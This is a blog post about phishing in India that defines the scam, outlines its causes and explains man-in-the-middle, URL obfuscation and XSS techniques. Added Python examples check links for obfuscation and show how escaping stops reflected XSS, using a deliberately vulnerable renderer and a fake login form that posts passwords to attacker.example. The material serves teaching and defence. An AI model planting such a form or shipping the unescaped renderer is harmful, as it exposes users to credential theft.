Tuesday, March 29, 2011

Phishing scams in India and legal provisions


phishing, noun, the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers, online.


Suppose one day you open your email and find an odd-looking mail from your bank; beware, it could be something phishy! A message in your inbox, apparently from the bank with which you hold an internet-enabled account, asking you to update your account with your personal information, login details, etc., on the pretext of a server upgrade, should not be acted upon. You would also see a link, clicking on which takes you to a look-alike website of your bank that appears quite authentic and convincing. You may be smart enough to know that this is a trap laid by a con artist to get your vital personal information, make fraudulent financial transactions and swindle your money. But many others are not as smart, fall into the trap, pass on their login details and lose their hard-earned money.

Phishing is an internet-age crime, born of the technological advances of that age, and a newer form of social engineering. Typically it is characterised by attempts to fraudulently acquire sensitive information, such as passwords, usernames, login IDs, ATM PINs and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message.

The phishing message then directs the recipient to a web page (a mirror webpage) designed to look exactly like the impersonated organisation’s (often a bank’s or financial institution’s) own website, where the user’s personal information is quietly harvested, often leaving the victim unaware of the attack. Phishing has become so rampant that even the Oxford English Dictionary added “phishing” to its latest edition, making it a definitive word of the English language.

It defines “Phishing” as:

As per the American Banker’s Association “Phishing attacks use 'spoofed' e-mails and fraudulent Web sites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, Social Security numbers, etc. By hijacking the trusted brands of well-known banks, online retailers and credit card companies, phishers are able to convince up to 5 percent of recipients to respond to them.”

The Anti-Phishing Working Group (APWG), an industry association focused on eliminating the identity theft and fraud that result from the growing problem of phishing and email spoofing, defines phishing as a form of online identity theft that employs both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials. According to the Annual Report of the Indian Computer Emergency Response Team (CERT-In), Dept. of Information Technology, Ministry of Communications & Information Technology (Govt. of India), CERT-In handled about 374 phishing incidents in the year 2009.

Major factors for increase in Phishing Attacks:

There are three major factors behind the recent spurt in phishing attacks worldwide, and particularly in India:

• Lack of awareness among the public: Worldwide, and particularly in India, there is a lack of awareness of phishing attacks among the common masses. Users are unaware that their personal information is actively being targeted by criminals, and they do not take proper precautions when they conduct online activities.

• Lack of awareness about policy: Fraudsters often count on the victim’s unawareness of the bank’s or financial institution’s policies and procedures for contacting customers, particularly for issues relating to account maintenance and fraud investigation. Customers unaware of the policies governing an online transaction are likely to be more susceptible to the social engineering aspect of a phishing scam, regardless of its technical sophistication.

• Technical sophistication: Fraudsters are now using advanced technology that has already been used successfully for activities such as spam, distributed denial of service (DDoS) and electronic surveillance. Even as customers become aware of phishing, criminals develop techniques to counter this awareness. These include URL obfuscation, to make phishing emails and websites appear more legitimate, and exploitation of vulnerabilities in web browsers that allow malicious code to be downloaded and executed from a hostile website.

Techniques of phishing attacks:

Man-in-the-middle attacks: In this class of attack, the attacker sits between the customer and the real web-based application and proxies all communications between the two systems. This form of attack succeeds against both HTTP and HTTPS communications. The customer connects to the attacker’s server as if it were the real site, while the attacker’s server makes a simultaneous connection to the real site. The attacker’s server then proxies all communications between the customer and the real web-based application server, typically in real time.

URL obfuscation attacks: Using URL obfuscation techniques, which involve minor changes to the URL, the fraudster tricks the user into following a hyperlink (URL) to the attacker’s server without the user realising that he has been duped. URL obfuscation relies on obscure, rarely noticed features of URL syntax and the underlying TCP/IP protocols to trick users into viewing a website they did not intend to visit.
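As an added illustration of the obfuscation tricks described above (this is example code written for this page, not part of the original post or of any product), the following Python script examines a hyperlink the way a mail filter or a careful reader might: it works out which host the browser would really connect to and flags the common disguises. The trusted domain "examplebank.in" and all the sample links are constructed assumptions.

```python
"""Added example: spotting common URL obfuscation tricks in links from an e-mail.

Assumptions (not from the article): the institution's real domain is
"examplebank.in"; every sample link below is constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import urlsplit

TRUSTED_DOMAIN = "examplebank.in"  # assumed real domain of the institution

# Something that reads like a URL or a bare host name (used for display text)
_URLISH = re.compile(r"(?i)(https?://\S+|[a-z0-9-]+(\.[a-z0-9-]+)+(/\S*)?)")


def true_host(url: str) -> str:
    """Return the host a browser would actually connect to for this URL.

    Text without a scheme (e.g. 'www.examplebank.in') is treated as a host,
    which is how such text is usually shown to the reader.
    """
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def same_site(host: str, trusted: str = TRUSTED_DOMAIN) -> bool:
    """True only for the trusted domain itself or a subdomain of it."""
    return host == trusted or host.endswith("." + trusted)


def analyze_link(href: str, display_text: str = "",
                 trusted: str = TRUSTED_DOMAIN) -> list:
    """Return warning tags for one hyperlink (an empty list means nothing odd)."""
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    warnings = []

    # 1. userinfo trick: http://www.examplebank.in@evil.example/ goes to evil.example
    if "@" in parts.netloc:
        warnings.append("userinfo_before_host")

    # 2. a raw IP address (dotted quad or IPv6) instead of a host name
    try:
        ipaddress.ip_address(host)
        warnings.append("ip_address_host")
    except ValueError:
        pass

    # 3. an IP address written as one decimal number, e.g. http://3232235777/
    if host.isdigit():
        warnings.append("decimal_ip_host")

    # 4. the brand name appears, but not on the real domain:
    #    examplebank.in.secure-update.example, secure-examplebank.example
    brand = trusted.split(".")[0]
    if brand in host and not same_site(host, trusted):
        warnings.append("lookalike_domain")

    # 5. internationalised host name: may hide look-alike characters
    if "xn--" in host:
        warnings.append("punycode_host")

    # 6. the address the reader sees differs from where the link really goes
    if display_text and _URLISH.fullmatch(display_text.strip()):
        if true_host(display_text.strip()) != host:
            warnings.append("display_text_mismatch")

    # 7. a login page should never be reached over plain HTTP
    if parts.scheme == "http":
        warnings.append("cleartext_http")

    return warnings


# Constructed sample links, paired with the text shown for them in the mail
SAMPLE_LINKS = [
    ("https://www.examplebank.in/login", "www.examplebank.in"),
    ("http://www.examplebank.in@203.0.113.7/login", "www.examplebank.in"),
    ("http://examplebank.in.secure-update.example/login", "Update your account"),
    ("http://3232235777/examplebank/", "https://www.examplebank.in/"),
]

if __name__ == "__main__":
    for href, text in SAMPLE_LINKS:
        print(f"{href:50} -> {analyze_link(href, text) or 'ok'}")
```

Only the genuine link comes back clean; the others are caught by more than one check each, which is the point of layering simple rules rather than relying on a single blacklist.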

XSS (cross-site scripting): Cross-site scripting attacks (XSS) make use of a custom URL or of code injected into a valid web-based application URL or embedded data field. In general, these XSS techniques result from a site’s failure to validate user input before returning it to the client’s web browser.

Phishing scenario in XSS:

• Victim logs into a website

• Attacker has spread “mines” using an XSS vulnerability

• Victim falls upon an XSS mine

• Victim gets a message saying that their session has terminated and they have to authenticate again

• Victim’s username and password are sent to the attacker
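To make the defect behind the XSS scenario above concrete, here is an added Python example (written for this page, not code from the original post) of a login page that reflects the submitted username into its error message. The vulnerable version echoes the input unchanged, so a crafted value can plant the fake “session expired, log in again” prompt described in the scenario; the hardened version HTML-escapes the input and adds a Content-Security-Policy header. The page template, the header values and the attacker input are all constructed for illustration.

```python
"""Added example: the input-validation failure behind reflected XSS, and the fix.

Not from the article. Assumes a page that echoes the submitted username back
in an error message; the attacker input below is constructed for illustration.
"""
import re
from html import escape

# Constructed page template: the only tags the real page is supposed to contain
PAGE = "<html><body><h1>Login</h1><p>{message}</p></body></html>"
TEMPLATE_TAGS = {"html", "body", "h1", "p"}


def render_error_vulnerable(username: str) -> str:
    """Echoes user input straight into the HTML: the defect described above."""
    return PAGE.format(message=f"Unknown user: {username}")


def render_error_safe(username: str) -> str:
    """Escapes <, >, &, " and ' so the input is shown as inert text."""
    return PAGE.format(message=f"Unknown user: {escape(username, quote=True)}")


# Defence in depth: even if escaping is missed somewhere, forms may only post
# back to this site and only scripts from this site may run (assumed policy).
SAFE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; form-action 'self'; script-src 'self'",
    "Content-Type": "text/html; charset=utf-8",
}


def injected_tags(rendered_html: str) -> list:
    """Return tag names in the rendered page that the template does not use.

    A non-empty result means user input was interpreted as markup.
    """
    found = re.findall(r"<\s*([a-zA-Z][a-zA-Z0-9]*)", rendered_html)
    return sorted({t.lower() for t in found} - TEMPLATE_TAGS)


# Constructed attacker input playing the role of the "mine" in the scenario:
# a fake re-login form whose action points away from the real site.
FAKE_LOGIN_PROMPT = (
    "<form action='https://attacker.example/collect'>Your session has expired. "
    "Please log in again: <input name='password'></form>"
)

if __name__ == "__main__":
    print("vulnerable page injects:", injected_tags(render_error_vulnerable(FAKE_LOGIN_PROMPT)))
    print("hardened page injects:  ", injected_tags(render_error_safe(FAKE_LOGIN_PROMPT)))
    print("hardened page shows:    ", render_error_safe(FAKE_LOGIN_PROMPT))
```

The `injected_tags` check is the kind of assertion a test suite can run over every page that reflects user input: the vulnerable renderer reports `form` and `input`, the hardened one reports nothing, because escaping turns `<form` into `&lt;form`, which the browser displays rather than interprets.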

(To be continued)
